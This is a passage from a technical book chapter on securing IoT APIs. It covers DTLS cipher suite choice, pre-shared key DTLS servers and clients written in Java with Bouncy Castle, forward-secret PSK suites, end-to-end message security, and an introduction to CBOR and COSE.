implementations were found to be susceptible to accidental nonce reuse. To prevent
this problem, TLS 1.3 introduced a new scheme based on implicit nonces: the nonce
for a TLS record is derived from the sequence number that TLS already keeps track
of for each connection. This was a significant security improvement because TLS
implementations must accurately keep track of the record sequence number to
ensure proper operation of the protocol, so accidental nonce reuse will result in an
immediate protocol failure (and is more likely to be caught by tests). You can read
more about this development at https://blog.cloudflare.com/tls-nonce-nse/.
Due to the unreliable nature of UDP-based protocols, DTLS requires that record
sequence numbers are explicitly added to all packets so that retransmitted or reor-
dered packets can be detected and handled. Combined with the fact that DTLS is
more lenient of duplicate packets, this makes accidental nonce reuse bugs in DTLS
applications using AES GCM more likely. You should therefore prefer alternative
cipher suites when using DTLS, such as those discussed in this section. In section
12.3.3, you’ll learn about authenticated encryption algorithms you can use in your
application that are more robust against nonce reuse.
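To illustrate the implicit-nonce scheme described in this sidebar, the following sketch shows how TLS 1.3 forms a per-record AEAD nonce (RFC 8446, section 5.3): the 64-bit record sequence number is XORed into the low-order bytes of the 12-byte IV derived from the key schedule.

// Derive the per-record AEAD nonce from the connection's write IV and
// the record sequence number, as in TLS 1.3.
static byte[] recordNonce(byte[] writeIv, long sequenceNumber) {
    var nonce = writeIv.clone();  // 12-byte IV from the key schedule
    for (int i = 0; i < 8; i++) {
        nonce[nonce.length - 1 - i] ^= (byte) (sequenceNumber >>> (8 * i));
    }
    return nonce;
}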
Figure 12.4 shows an overview of the software components and algorithms that are
required to support a set of TLS cipher suites that are commonly used for web con-
nections. TLS supports a variety of key exchange algorithms used during the initial
handshake, each of which needs different cryptographic primitives to be imple-
mented. Some of these also require digital signatures to be implemented, again with
several choices of algorithms. Some signature algorithms support different group
parameters, such as elliptic curves used for ECDSA signatures, which require further
code. After the handshake completes, there are several choices for cipher modes and
MAC algorithms for securing application data. X.509 certificate authentication itself
requires additional code. This can add up to a significant amount of code to include
on a constrained device.
Figure 12.4 A cross-section of algorithms and components that must be implemented to support common TLS web connections. Key exchange and signature algorithms are used during the initial handshake to establish session keys, and then cipher modes and MACs are used to secure application data once a session has been established. X.509 certificates require a lot of complex code for parsing, validation, and checking for revoked certificates (via OCSP or CRLs).
For these reasons, other cipher suites are often popular in IoT applications. As an
alternative to forward secret cipher suites, there are older cipher suites based on
either RSA encryption or static Diffie-Hellman key agreement (or the elliptic curve
variant, ECDH). Unfortunately, both algorithm families have significant security weak-
nesses, not directly related to their lack of forward secrecy. RSA key exchange uses an
old mode of encryption (known as PKCS#1 version 1.5) that is very hard to implement
securely and has resulted in many vulnerabilities in TLS implementations. Static
ECDH key agreement has potential security weaknesses of its own, such as invalid
curve attacks that can reveal the server’s long-term private key; it is rarely implemented.
For these reasons, you should prefer forward secret cipher suites whenever possible,
as they provide better protection against common cryptographic vulnerabilities. TLS
1.3 has completely removed these older modes due to their insecurity.
DEFINITION
An invalid curve attack is an attack on elliptic curve cryptographic
keys. An attacker sends the victim a public key on a different (but related)
elliptic curve to the victim’s private key. If the victim’s TLS library doesn’t val-
idate the received public key carefully, then the result may leak information
about their private key. Although ephemeral ECDH cipher suites (those with
ECDHE in the name) are also vulnerable to invalid curve attacks, they are
much harder to exploit because each private key is only used once.
Even if you use an older cipher suite, a DTLS implementation is required to include
support for signatures in order to validate certificates that are presented by the server
(and optionally by the client) during the handshake. An extension to TLS and DTLS
allows certificates to be replaced with raw public keys (https://tools.ietf.org/html/
rfc7250). This allows the complex certificate parsing and validation code to be elimi-
nated, along with support for many signature algorithms, resulting in a large reduc-
tion in code size. The downside is that keys must instead be manually distributed to all
devices, but this can be a viable approach in some environments. Another alternative
is to use pre-shared keys, which you’ll learn more about in section 12.2.
DEFINITION
Raw public keys can be used to eliminate the complex code required
to parse and verify X.509 certificates and verify signatures over those certifi-
cates. A raw public key must be manually distributed to devices over a secure
channel (for example, during manufacture).
The situation is somewhat better when you look at the symmetric cryptography used
to secure application data after the TLS handshake and key exchange has completed.
There are two alternative cryptographic algorithms that can be used instead of the
usual AES-GCM and AES-CBC modes:
- Cipher suites based on AES in CCM mode provide authenticated encryption using only an AES encryption circuit, reducing code size compared to CBC mode and offering a bit more robustness than GCM. CCM has become widely adopted in IoT applications and standards, but it has some undesirable features too, as discussed in a critique of the mode by Phillip Rogaway and David Wagner (https://web.cs.ucdavis.edu/~rogaway/papers/ccm.pdf).
- The ChaCha20-Poly1305 cipher suites can be implemented securely in software with relatively little code and good performance on a range of CPU architectures. Google adapted these cipher suites for TLS to provide better performance and security on mobile devices that lack AES hardware acceleration.
DEFINITION
AES-CCM (Counter with CBC-MAC) is an authenticated encryp-
tion algorithm based solely on the use of an AES encryption circuit for all
operations. It uses AES in Counter mode for encryption and decryption, and
a Message Authentication Code (MAC) based on AES in CBC mode for
authentication. ChaCha20-Poly1305 is a stream cipher and MAC designed by
Daniel Bernstein that is very fast and easy to implement in software.
Both of these choices have fewer weaknesses compared to either AES-GCM or the
older AES-CBC modes when implemented on constrained devices.5 If your devices
have hardware support for AES, for example in a dedicated secure element chip, then
CCM can be an attractive choice. In most other cases, ChaCha20-Poly1305 can be eas-
ier to implement securely. Java has support for ChaCha20-Poly1305 cipher suites since
Java 12. If you have Java 12 installed, you can force the use of ChaCha20-Poly1305 by
specifying a custom SSLParameters object and passing it to the setSSLParameters()
method on the SSLEngine. Listing 12.7 shows how to configure the parameters to
only allow ChaCha20-Poly1305-based cipher suites. If you have Java 12, open the DtlsClient.java file and add the new method to the class. Otherwise, skip this example.
TIP
If you need to support servers or clients running older versions of DTLS,
you should add the TLS_EMPTY_RENEGOTIATION_INFO_SCSV marker cipher
suite. Otherwise Java may be unable to negotiate a connection with some
older software. This cipher suite is enabled by default so be sure to re-enable
it when specifying custom cipher suites.
Listing 12.7 Forcing use of ChaCha20-Poly1305

private static SSLParameters sslParameters() {
    // Use the defaults from the DtlsDatagramChannel.
    var params = DtlsDatagramChannel.defaultSslParameters();
    // Enable only cipher suites that use ChaCha20-Poly1305.
    params.setCipherSuites(new String[] {
        "TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256",
        "TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
        "TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256",
        // Include this suite if you need to support multiple DTLS versions.
        "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
    });
    return params;
}

5 ChaCha20-Poly1305 also suffers from nonce reuse problems similar to GCM, but to a lesser extent. GCM loses all authenticity guarantees after a single nonce reuse, while ChaCha20-Poly1305 only loses these guarantees for messages encrypted with the duplicate nonce.
After adding the new method, you can update the call to the DtlsDatagramChannel
constructor in the same file to pass the custom parameters:
try (var channel = new DtlsDatagramChannel(getClientContext(),
        sslParameters())) {
If you make that change and re-run the client, you’ll see that the connection now uses
ChaCha20-Poly1305, so long as both the client and server are using Java 12 or later.
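One way to check programmatically which suite was negotiated is to ask the SSLEngine for its current session. This is only a sketch: the sslEngine() accessor shown here is hypothetical, so substitute however your DtlsDatagramChannel exposes its engine:

var engine = channel.sslEngine();  // hypothetical accessor on DtlsDatagramChannel
System.out.println("Negotiated cipher suite: "
        + engine.getSession().getCipherSuite());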
WARNING
The example in listing 12.7 uses the default parameters from the
DtlsDatagramChannel class. If you create your own parameters, ensure that
you set an endpoint identification algorithm. Otherwise, Java won’t validate
that the server’s certificate matches the hostname you have connected to and
the connection may be vulnerable to man-in-the-middle attacks. You can set
the identification algorithm by calling "params.setEndpointIdentication-
Algorithm("HTTPS")".
AES-CCM is not yet supported by Java, although work is in progress to add support.
The Bouncy Castle library (https://www.bouncycastle.org/java.html) supports CCM
cipher suites with DTLS, but only through a different API and not the standard SSLEngine API. There's an example using the Bouncy Castle DTLS API with CCM in sec-
tion 12.2.1.
The CCM cipher suites come in two variations:

- The original cipher suites, whose names end in _CCM, use a 128-bit authentication tag.
- Cipher suites ending in _CCM_8 use a shorter 64-bit authentication tag. This can be useful if you need to save every byte in network messages, but it provides much weaker protection against message forgery and tampering.
You should therefore prefer using the variants with a 128-bit authentication tag unless
you have other measures in place to prevent message forgery, such as strong network
protections, and you know that you need to reduce network overheads. You should
apply strict rate-limiting to API endpoints where there is a risk of brute force attacks
against authentication tags; see chapter 3 for details on how to apply rate-limiting.
Pop quiz

1 Which SSLEngine handshake status indicates that a message needs to be sent across the network?
a NEED_TASK
b NEED_WRAP
c NEED_UNWRAP
d NEED_UNWRAP_AGAIN

2 Which one of the following is an increased risk when using AES-GCM cipher suites for IoT applications compared to other modes?
a A breakthrough attack on AES
b Nonce reuse leading to a loss of security
c Overly large ciphertexts causing packet fragmentation
d Decryption is too expensive for constrained devices

The answers are at the end of the chapter.
12.2 Pre-shared keys
In some particularly constrained environments, devices may not be capable of carry-
ing out the public key cryptography required for a TLS handshake. For example, tight
constraints on available memory and code size may make it hard to support public key
signature or key-agreement algorithms. In these environments, you can still use TLS
(or DTLS) by using cipher suites based on pre-shared keys (PSK) instead of certificates
for authentication. PSK cipher suites can result in a dramatic reduction in the amount
of code needed to implement TLS, as shown in figure 12.5, because the certificate pars-
ing and validation code, along with the signatures and public key exchange modes can
all be eliminated.
DEFINITION
A pre-shared key (PSK) is a symmetric key that is directly shared
with the client and server ahead of time. A PSK can be used to avoid the over-
heads of public key cryptography on constrained devices.
In TLS 1.2 and DTLS 1.2, a PSK can be used by specifying dedicated PSK cipher suites
such as TLS_PSK_WITH_AES_128_CCM. In TLS 1.3 and the upcoming DTLS 1.3, use of a
PSK is negotiated using an extension that the client sends in the initial ClientHello
message. Once a PSK cipher suite has been selected, the server and client derive ses-
sion keys from the PSK and random values that they each contribute during the hand-
shake, ensuring that unique keys are still used for every session. The session key is
used to compute an HMAC tag over all of the handshake messages, providing authenti-
cation of the session: only somebody with access to the PSK could derive the same
HMAC key and compute the correct authentication tag.
CAUTION
Although unique session keys are generated for each session, the
basic PSK cipher suites lack forward secrecy: an attacker that compromises
the PSK can easily derive the session keys for every previous session if they
captured the handshake messages. Section 12.2.4 discusses PSK cipher suites
with forward secrecy.
Because PSK is based on symmetric cryptography, with the client and server both
using the same key, it provides mutual authentication of both parties. Unlike client
certificate authentication, however, there is no name associated with the client apart
from an opaque identifier for the PSK, so a server must maintain a mapping between
PSKs and the associated client or rely on another method for authenticating the cli-
ent’s identity.
WARNING
Although TLS allows the PSK to be any length, you should only
use a PSK that is cryptographically strong, such as a 128-bit value from a
secure random number generator. PSK cipher suites are not suitable for use
with passwords because an attacker can perform an offline dictionary or
brute-force attack after seeing one PSK handshake.
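For example, a fresh 128-bit PSK can be generated with a SecureRandom and saved to a PKCS#12 keystore. This is a minimal sketch; the alias, file name, and password are illustrative:

var password = "changeit".toCharArray();   // keystore password (example)
var psk = new byte[16];                    // 128-bit PSK
new SecureRandom().nextBytes(psk);
var key = new SecretKeySpec(psk, "AES");   // algorithm name is just a label here
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(null, null);                 // start with an empty keystore
keyStore.setEntry("psk-key", new KeyStore.SecretKeyEntry(key),
        new KeyStore.PasswordProtection(password));
try (var out = new FileOutputStream("keystore.p12")) {
    keyStore.store(out, password);
}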
[Figure 12.5 shows the same components as figure 12.4 with most of them crossed out: only a single simple key exchange algorithm (PSK) is required; unsuitable cipher algorithms can be dropped in favor of low-footprint choices such as AES-CCM or ChaCha20-Poly1305; HMAC is still required for key derivation and authentication; and all the complex and error-prone certificate parsing and validation code can be removed.]

Figure 12.5 Use of pre-shared key (PSK) cipher suites allows implementations to remove a lot of complex code from a TLS implementation. Signature algorithms are no longer needed at all and can be removed, as can most key exchange algorithms. The complex X.509 certificate parsing and validation logic can be deleted too, leaving only the basic symmetric cryptography primitives.
12.2.1 Implementing a PSK server
Listing 12.8 shows how to load a PSK from a keystore. For this example, you can load
the existing HMAC key that you created in chapter 6, but it is good practice to use dis-
tinct keys for different uses within an application even if they happen to use the same
algorithm. A PSK is just a random array of bytes, so you can call the getEncoded()
method to get the raw bytes from the Key object. Create a new file named PskServer.java under src/main/java/com/manning/apisecurityinaction and copy in the
contents of the listing. You’ll flesh out the rest of the server in a moment.
Listing 12.8 Loading a PSK

package com.manning.apisecurityinaction;

import static java.nio.charset.StandardCharsets.UTF_8;

import java.io.FileInputStream;
import java.net.*;
import java.security.*;

import org.bouncycastle.tls.*;
import org.bouncycastle.tls.crypto.impl.bc.BcTlsCrypto;

public class PskServer {
    static byte[] loadPsk(char[] password) throws Exception {
        // Load the keystore.
        var keyStore = KeyStore.getInstance("PKCS12");
        keyStore.load(new FileInputStream("keystore.p12"), password);
        // Load the key and extract the raw bytes.
        return keyStore.getKey("hmac-key", password).getEncoded();
    }
}
Listing 12.9 shows a basic DTLS server with pre-shared keys written using the Bouncy Castle API. The following steps are used to initialize the server and perform a PSK handshake with the client:

- First load the PSK from the keystore.
- Then initialize a PSKTlsServer object, which requires two arguments: a BcTlsCrypto object and a TlsPSKIdentityManager, which is used to look up the PSK for a given client. You'll come back to the identity manager shortly.
- The PSKTlsServer class only advertises support for normal TLS by default, although it supports DTLS just fine. Override the getSupportedVersions() method to ensure that DTLS 1.2 support is enabled; otherwise, the handshake will fail. The supported protocol versions are communicated during the handshake, and some clients may fail if there are both TLS and DTLS versions in the list.
- Just like the DtlsDatagramChannel you used before, Bouncy Castle requires the UDP socket to be connected before the DTLS handshake occurs. Because the server doesn't know where the client is located, you can wait until a packet is received from any client and then call connect() with the socket address of the client.
- Create DTLSServerProtocol and UDPTransport objects, and then call the accept method on the protocol object to perform the DTLS handshake. This returns a DTLSTransport object that you can then use to send and receive encrypted and authenticated packets with the client.
TIP
Although the Bouncy Castle API is straightforward when using PSKs, I
find it cumbersome and hard to debug if you want to use certificate authenti-
cation, and I prefer the SSLEngine API.
Listing 12.9 DTLS PSK server

public static void main(String[] args) throws Exception {
    // Load the PSK from the keystore.
    var psk = loadPsk(args[0].toCharArray());

    // Create a new PSKTlsServer and override the supported
    // versions to allow DTLS.
    var crypto = new BcTlsCrypto(new SecureRandom());
    var server = new PSKTlsServer(crypto, getIdentityManager(psk)) {
        @Override
        protected ProtocolVersion[] getSupportedVersions() {
            return ProtocolVersion.DTLSv12.only();
        }
    };

    // Bouncy Castle requires the socket to be connected
    // before the handshake.
    var buffer = new byte[2048];
    var serverSocket = new DatagramSocket(54321);
    var packet = new DatagramPacket(buffer, buffer.length);
    serverSocket.receive(packet);
    serverSocket.connect(packet.getSocketAddress());

    // Create a DTLS protocol and perform the handshake using the PSK.
    var protocol = new DTLSServerProtocol();
    var transport = new UDPTransport(serverSocket, 1500);
    var dtls = protocol.accept(server, transport);

    // Receive messages from the client and print them out.
    while (true) {
        var len = dtls.receive(buffer, 0, buffer.length, 60000);
        if (len == -1) break;
        var data = new String(buffer, 0, len, UTF_8);
        System.out.println("Received: " + data);
    }
}
The missing part of the puzzle is the PSK identity manager, which is responsible for
determining which PSK to use with each client. Listing 12.10 shows a very simple
implementation of this interface for the example, which returns the same PSK for
every client. The client sends an identifier as part of the PSK handshake, so a more
sophisticated implementation could look up different PSKs for each client. The server
can also provide a hint to help the client determine which PSK it should use, in case it
has multiple PSKs. You can leave this null here, which instructs the server not to send
a hint. Open the PskServer.java file and add the method from listing 12.10 to com-
plete the server implementation.
TIP
A scalable solution would be for the server to generate distinct PSKs for
each client from a master key using HKDF, as discussed in chapter 11.
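For illustration, a per-client PSK could be derived with a single HKDF-expand step implemented directly with HMAC-SHA-256. This is only a sketch, not part of the book's listings; how the master key and client identifier are managed is an assumption:

static byte[] derivePsk(java.security.Key masterKey, byte[] clientId)
        throws Exception {
    // Single-block HKDF-expand: HMAC(masterKey, label || clientId || counter)
    var hmac = javax.crypto.Mac.getInstance("HmacSHA256");
    hmac.init(masterKey);
    hmac.update("psk".getBytes(UTF_8));   // label to separate key uses
    hmac.update(clientId);
    hmac.update((byte) 1);                // block counter
    return hmac.doFinal();                // 32-byte PSK for this client
}

The getPSK(identity) method of the identity manager could then call derivePsk(masterKey, identity) instead of returning a fixed key.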
Listing 12.10 The PSK identity manager

static TlsPSKIdentityManager getIdentityManager(byte[] psk) {
    return new TlsPSKIdentityManager() {
        @Override
        public byte[] getHint() {
            // Leave the PSK hint unspecified.
            return null;
        }

        @Override
        public byte[] getPSK(byte[] identity) {
            // Return the same PSK for all clients.
            return psk;
        }
    };
}
12.2.2 The PSK client
The PSK client is very similar to the server, as shown in listing 12.11. As before, you
create a new BcTlsCrypto object and use that to initialize a PSKTlsClient object. In
this case, you pass in the PSK and an identifier for it. If you don’t have a good identi-
fier for your PSK already, then a secure hash of the PSK works well. You can use the
Crypto.hash() method from the Salty Coffee library from chapter 6, which uses
SHA-512. As for the server, you need to override the getSupportedVersions()
method to ensure DTLS support is enabled. You can then connect to the server and
perform the DTLS handshake using the DTLSClientProtocol object. The connect()
method returns a DTLSTransport object that you can then use to send and receive
encrypted packets with the server.
Create a new file named PskClient.java alongside the server class and type in the contents of the listing to create the client. If your editor doesn't automatically add
them, you’ll need to add the following imports to the top of the file:
import static java.nio.charset.StandardCharsets.UTF_8;

import java.io.FileInputStream;
import java.net.*;
import java.nio.file.*;
import java.security.*;

import org.bouncycastle.tls.*;
import org.bouncycastle.tls.crypto.impl.bc.BcTlsCrypto;
import software.pando.crypto.nacl.Crypto;
Listing 12.11 The PSK client

package com.manning.apisecurityinaction;

public class PskClient {
    public static void main(String[] args) throws Exception {
        // Load the PSK and generate an ID for it.
        var psk = PskServer.loadPsk(args[0].toCharArray());
        var pskId = Crypto.hash(psk);

        // Create a PSKTlsClient with the PSK, overriding the
        // supported versions to ensure DTLS support.
        var crypto = new BcTlsCrypto(new SecureRandom());
        var client = new PSKTlsClient(crypto, pskId, psk) {
            @Override
            protected ProtocolVersion[] getSupportedVersions() {
                return ProtocolVersion.DTLSv12.only();
            }
        };

        // Connect to the server and send a dummy packet
        // to start the handshake.
        var address = InetAddress.getByName("localhost");
        var socket = new DatagramSocket();
        socket.connect(address, 54321);
        socket.send(new DatagramPacket(new byte[0], 0));

        // Create the DTLSClientProtocol instance and perform
        // the handshake over UDP.
        var transport = new UDPTransport(socket, 1500);
        var protocol = new DTLSClientProtocol();
        var dtls = protocol.connect(client, transport);

        // Send encrypted packets using the returned DTLSTransport object.
        try (var in = Files.newBufferedReader(Paths.get("test.txt"))) {
            String line;
            while ((line = in.readLine()) != null) {
                System.out.println("Sending: " + line);
                var buf = line.getBytes(UTF_8);
                dtls.send(buf, 0, buf.length);
            }
        }
    }
}
You can now test out the handshake by running the server and client in separate ter-
minal windows. Open two terminals and change to the root directory of the project in
both. Then run the following in the first one:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.PskServer \
-Dexec.args=changeit
This will compile and run the server class. If you’ve changed the keystore password,
then supply the correct value on the command line. Open the second terminal win-
dow and run the client too:
mvn exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.PskClient \
-Dexec.args=changeit
After the compilation has finished, you’ll see the client sending the lines of text to the
server and the server receiving them.
NOTE
As in previous examples, this sample code makes no attempt to handle
lost packets after the handshake has completed.
12.2.3 Supporting raw PSK cipher suites
By default, Bouncy Castle follows the recommendations from the IETF and only
enables PSK cipher suites combined with ephemeral Diffie-Hellman key agreement to
provide forward secrecy. These cipher suites are discussed in section 12.1.4. Although
these are more secure than the raw PSK cipher suites, they are not suitable for very
constrained devices that can’t perform public key cryptography. To enable the raw
PSK cipher suites, you have to override the getSupportedCipherSuites() method in
both the client and the server. Listing 12.12 shows how to override this method for the
server, in this case providing support for just a single PSK cipher suite using AES-CCM
to force its use. An identical change can be made to the PSKTlsClient object.
Listing 12.12 Enabling raw PSK cipher suites

var server = new PSKTlsServer(crypto, getIdentityManager(psk)) {
    @Override
    protected ProtocolVersion[] getSupportedVersions() {
        return ProtocolVersion.DTLSv12.only();
    }

    // Override the getSupportedCipherSuites method
    // to return raw PSK suites.
    @Override
    protected int[] getSupportedCipherSuites() {
        return new int[] {
            CipherSuite.TLS_PSK_WITH_AES_128_CCM
        };
    }
};
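For completeness, here is the matching change on the client side, mirroring the server override above. This is a sketch using the crypto, pskId, and psk variables from listing 12.11:

var client = new PSKTlsClient(crypto, pskId, psk) {
    @Override
    protected ProtocolVersion[] getSupportedVersions() {
        return ProtocolVersion.DTLSv12.only();
    }

    @Override
    protected int[] getSupportedCipherSuites() {
        return new int[] {
            CipherSuite.TLS_PSK_WITH_AES_128_CCM
        };
    }
};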
Bouncy Castle supports a wide range of raw PSK cipher suites in DTLS 1.2, shown in
table 12.2. Most of these also have equivalents in TLS 1.3. I haven’t listed the older
variants using CBC mode or those with unusual ciphers such as Camellia (the Japa-
nese equivalent of AES); you should generally avoid these in IoT applications.
Table 12.2 Raw PSK cipher suites

Cipher suite                               Description
TLS_PSK_WITH_AES_128_CCM                   AES in CCM mode with 128-bit keys and 128-bit authentication tags
TLS_PSK_WITH_AES_128_CCM_8                 AES in CCM mode with 128-bit keys and 64-bit authentication tags
TLS_PSK_WITH_AES_256_CCM                   AES in CCM mode with 256-bit keys and 128-bit authentication tags
TLS_PSK_WITH_AES_256_CCM_8                 AES in CCM mode with 256-bit keys and 64-bit authentication tags
TLS_PSK_WITH_AES_128_GCM_SHA256            AES in GCM mode with 128-bit keys
TLS_PSK_WITH_AES_256_GCM_SHA384            AES in GCM mode with 256-bit keys
TLS_PSK_WITH_CHACHA20_POLY1305_SHA256      ChaCha20-Poly1305 with 256-bit keys
12.2.4 PSK with forward secrecy
I mentioned in section 12.1.3 that the raw PSK cipher suites lack forward secrecy: if
the PSK is compromised, then all previously captured traffic can be easily decrypted.
If confidentiality of data is important to your application and your devices can support
a limited amount of public key cryptography, you can opt for PSK cipher suites com-
bined with ephemeral Diffie-Hellman key agreement to ensure forward secrecy. In
these cipher suites, authentication of the client and server is still guaranteed by the
PSK, but both parties generate random public-private key-pairs and swap the public
keys during the handshake, as shown in figure 12.6. The output of a Diffie-Hellman
key agreement between each side’s ephemeral private key and the other party’s
ephemeral public key is then mixed into the derivation of the session keys. The magic
of Diffie-Hellman ensures that the session keys can’t be recovered by an attacker that
observes the handshake messages, even if they later recover the PSK. The ephemeral
private keys are scrubbed from memory as soon as the handshake completes.
[Figure 12.6 shows the client and server, each holding the same pre-shared key (PSK) and each generating a fresh random ephemeral key pair for every connection. The handshake messages are ClientHello, ServerHello, ServerKeyExchange (carrying the PSK ID hint and the server's ephemeral public key), and ClientKeyExchange (carrying the PSK ID and the client's ephemeral public key).]

Figure 12.6 PSK cipher suites with forward secrecy use ephemeral key pairs in addition to the PSK. The client and server swap ephemeral public keys in key exchange messages during the TLS handshake. A Diffie-Hellman key agreement is then performed between each side's ephemeral private key and the received ephemeral public key, which produces an identical secret value that is then mixed into the TLS key derivation process.
Table 12.3 shows some recommended PSK cipher suites for TLS or DTLS 1.2 that pro-
vide forward secrecy. The ephemeral Diffie-Hellman keys can be based on either the
original finite-field Diffie-Hellman, in which case the suite names contain DHE, or on
elliptic curve Diffie-Hellman, in which case they contain ECDHE. In general, the
ECDHE variants are better-suited to constrained devices because secure parameters
for DHE require large key sizes of 2048 bits or more. The newer X25519 elliptic curve
is efficient and secure when implemented in software, but it has only recently been
standardized for use in TLS 1.3.6 The secp256r1 curve (also known as prime256v1 or
P-256) is commonly implemented by low-cost secure element microchips and is a rea-
sonable choice too.
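To opt in to one of these suites, you can override getSupportedCipherSuites() on the server (and client) just as in listing 12.12. A minimal sketch for the server, assuming Bouncy Castle's CipherSuite class defines the constant for this RFC 7905 suite:

var server = new PSKTlsServer(crypto, getIdentityManager(psk)) {
    @Override
    protected ProtocolVersion[] getSupportedVersions() {
        return ProtocolVersion.DTLSv12.only();
    }

    @Override
    protected int[] getSupportedCipherSuites() {
        // A forward-secret PSK suite: ECDHE plus ChaCha20-Poly1305
        return new int[] {
            CipherSuite.TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
        };
    }
};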
Custom protocols and the Noise protocol framework
Although for most IoT applications TLS or DTLS should be perfectly adequate for your
needs, you may feel tempted to design your own cryptographic protocol that is a cus-
tom fit for your application. This is almost always a mistake, because even experi-
enced cryptographers have made serious mistakes when designing protocols.
Despite this widely repeated advice, many custom IoT security protocols have been
developed, and new ones continue to be made. If you feel that you must develop a
custom protocol for your application and can’t use TLS or DTLS, the Noise protocol
framework (https://noiseprotocol.org) can be used as a starting point. Noise describes
how to construct a secure protocol from a few basic building blocks and describes a
variety of handshakes that achieve different security goals. Most importantly, Noise
is designed and reviewed by experts and has been used in real-world applications,
such as the WireGuard VPN protocol (https://www.wireguard.com).
6 Support for X25519 has also been added to TLS 1.2 and earlier in a subsequent update; see https://tools.ietf.org/html/rfc8422.
Table 12.3 PSK cipher suites with forward secrecy

TLS_ECDHE_PSK_WITH_AES_128_CCM_SHA256
    PSK with ECDHE followed by AES-CCM with 128-bit keys and 128-bit authentication tags. SHA-256 is used for key derivation and handshake authentication.

TLS_DHE_PSK_WITH_AES_128_CCM
TLS_DHE_PSK_WITH_AES_256_CCM
    PSK with DHE followed by AES-CCM with either 128-bit or 256-bit keys. These also use SHA-256 for key derivation and handshake authentication.

TLS_DHE_PSK_WITH_CHACHA20_POLY1305_SHA256
TLS_ECDHE_PSK_WITH_CHACHA20_POLY1305_SHA256
    PSK with either DHE or ECDHE followed by ChaCha20-Poly1305.
All of the CCM cipher suites also come in a CCM_8 variant that uses a short 64-bit
authentication tag. As previously discussed, these variants should only be used if you
need to save every byte of network use and you are confident that you have alternative
measures in place to ensure authenticity of network traffic. AES-GCM is also sup-
ported by PSK cipher suites, but I would not recommend it in constrained environ-
ments due to the increased risk of accidental nonce reuse.
12.3 End-to-end security
TLS and DTLS provide excellent security when an API client can talk directly to the
server. However, as mentioned in the introduction to section 12.1, in a typical IoT
application messages may travel over multiple different protocols. For example, sen-
sor data produced by devices may be sent over low-power wireless networks to a local
gateway, which then puts them onto an MQTT message queue for transmission to another service, which aggregates the data and performs an HTTP POST request to a
cloud REST API for analysis and storage. Although each hop on this journey can be
secured using TLS, messages are available unencrypted while being processed at the
intermediate nodes. This makes these intermediate nodes an attractive target for
attackers because, once compromised, they can view and manipulate all data flowing
through that device.
The solution is to provide end-to-end security of all data, independent of the trans-
port layer security. Rather than relying on the transport protocol to provide encryp-
tion and authentication, the message itself is encrypted and authenticated. For
example, an API that expects requests with a JSON payload (or an efficient binary
alternative) can be adapted to accept data that has been encrypted with an authenti-
cated encryption algorithm, which it then manually decrypts and verifies as shown in
figure 12.7. This ensures that an API request encrypted by the original client can only
be decrypted by the destination API, no matter how many different network protocols
are used to transport the request from the client to its destination.
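To make that concrete, here's a sketch of the receiving side using the SecretBox class from chapter 6; the encryptedBody string and key are assumed to be supplied by your API framework, and the method names follow the Salty Coffee API used in that chapter:

// Decrypt-then-parse: only handle the payload after authentication succeeds.
var box = SecretBox.fromString(encryptedBody);   // parse nonce + ciphertext
var payload = box.decrypt(key);                  // throws if authentication fails
var request = CBORObject.DecodeFromBytes(payload);  // only now parse the request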
Pop quiz

3 True or False: PSK cipher suites without forward secrecy derive the same encryption keys for every session.

4 Which one of the following cryptographic primitives is used to ensure forward secrecy in PSK cipher suites that support this?
a RSA encryption
b RSA signatures
c HKDF key derivation
d Diffie-Hellman key agreement
e Elliptic curve digital signatures

The answers are at the end of the chapter.
NOTE
End-to-end security is not a replacement for transport layer security.
Transport protocol messages contain headers and other details that are not
protected by end-to-end encryption or authentication. You should aim to
include security at both layers of your architecture.
End-to-end security involves more than simply encrypting and decrypting data pack-
ets. Secure transport protocols, such as TLS, also ensure that both parties are ade-
quately authenticated, and that data packets cannot be reordered or replayed. In the
next few sections you’ll see how to ensure the same protections are provided when
using end-to-end security.
12.3.1 COSE
If you wanted to ensure end-to-end security of requests to a regular JSON-based REST
API, you might be tempted to look at the JOSE (JSON Object Signing and Encryp-
tion) standards discussed in chapter 6. For IoT applications, JSON is often replaced by
more efficient binary encodings that make better use of constrained memory and net-
work bandwidth and that have compact software implementations. For example,
numeric data such as sensor readings is typically encoded as decimal strings in JSON,
with only 10 possible values for each byte, which is wasteful compared to a packed
binary encoding of the same data.
[Figure 12.7 shows a device sending a request over BLE to a gateway, which forwards it over MQTT to another gateway, which forwards it over HTTP to a cloud API. Device requests are individually encrypted and authenticated, creating a message envelope; the encrypted request passes through the gateways without being decrypted, although the gateways can still translate the unencrypted transport protocol headers; the target API decrypts and validates the received message to retrieve the original API request.]

Figure 12.7 In end-to-end security, API requests are individually encrypted and authenticated by the client device. These encrypted requests can then traverse multiple transport protocols without being decrypted. The API can then decrypt the request and verify it hasn't been tampered with before processing the API request.
Several binary alternatives to JSON have become popular in recent years to over-
come these problems. One popular choice is Concise Binary Object Representation
(CBOR), which provides a compact binary format that roughly follows the same model
as JSON, providing support for objects consisting of key-value fields, arrays, text and
binary strings, and integer and floating-point numbers. Like JSON, CBOR can be
parsed and processed without a schema. On top of CBOR, the CBOR Object Signing
and Encryption (COSE; https://tools.ietf.org/html/rfc8152) standards provide simi-
lar cryptographic capabilities as JOSE does for JSON.
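For example, using the CBORObject API that appears in the listings later in this chapter, a sensor reading can be encoded to a compact binary form and parsed back without a schema (a small illustrative sketch; the field names are arbitrary):

var reading = CBORObject.NewMap()
        .Add("sensor", "F5671434")
        .Add("reading", 1234);
byte[] compact = reading.EncodeToBytes();        // compact binary encoding
var parsed = CBORObject.DecodeFromBytes(compact);  // schema-free parsing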
DEFINITION
CBOR (Concise Binary Object Representation) is a binary alterna-
tive to JSON. COSE (CBOR Object Signing and Encryption) provides encryp-
tion and digital signature capabilities for CBOR and is loosely based on JOSE.
Although COSE is loosely based on JOSE, it has diverged quite a lot, both in the algo-
rithms supported and in how messages are formatted. For example, in JOSE, symmetric MAC algorithms like HMAC are part of JWS (JSON Web Signatures) and treated
as equivalent to public key signature algorithms. In COSE, MACs are treated more
